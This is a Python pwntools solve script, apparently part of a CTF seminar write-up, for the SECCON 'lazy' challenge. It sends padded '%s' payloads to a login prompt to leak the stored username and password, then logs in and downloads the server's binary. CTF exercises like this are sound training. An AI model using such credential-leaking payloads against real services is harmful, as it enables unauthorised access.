Add writeup for day 17 of OTW Advent CTF

[pub/jan/ctf-seminar.git] / writeups / hah / seccond19 / lazy_solve.py

#!/usr/bin/python

from pwn import *

username = "_H4CK3R_"
password = "3XPL01717"

leak_password_payload = "A" * 29 + "%s"
leak_username_payload = "A" * 29 + "B" * 32 + "%s"

def get_connection():
    r = remote("lazy.chal.seccon.jp", 33333)
    #r = process("./source")
    return r

def leak_with_payload(payload):
    r = get_connection()
    r.recvline_startswith("3: Exit")
    r.sendline("2") # Login
    r.sendline(payload)
    r.recvline_startswith("username :")
    leak = r.recvline(False)
    r.close()
    return(leak)

def get_loggedin_connection(username, password):
    r = get_connection()
    r.recvline_startswith("3: Exit")
    r.sendline("2") # Login
    r.sendline(username)
    r.sendline(password)
    return r

def retrieve_login_source():
    r = get_connection()
    file = open("login_source.c", "w")
    r.sendline("1") # Public contents
    r.sendline("login_source.c")
    r.recvuntil("bytes")
    file.write(r.recvn(1201))
    file.close()
    r.close()

def retrieve_binary(username, password):
    r = get_loggedin_connection(username, password)
    file = open("lazy", "wb")
    r.sendline("4") # Manage
    r.sendline("lazy") # Remote filename
    r.recvuntil("bytes")
    file.write(r.recvn(14216))
    file.close()
    r.close()

print("### Step 1: Retrieving provided partial source code")
retrieve_login_source()

print("### Step 2: Leak username and password")
leaked_username = leak_with_payload(leak_username_payload)
leaked_password = leak_with_payload(leak_password_payload)
print("Leaked username: {}".format(leaked_username))
print("Leaked password: {}".format(leaked_password))

print("### Step 3: Login and download binary")
retrieve_binary(leaked_username, leaked_password)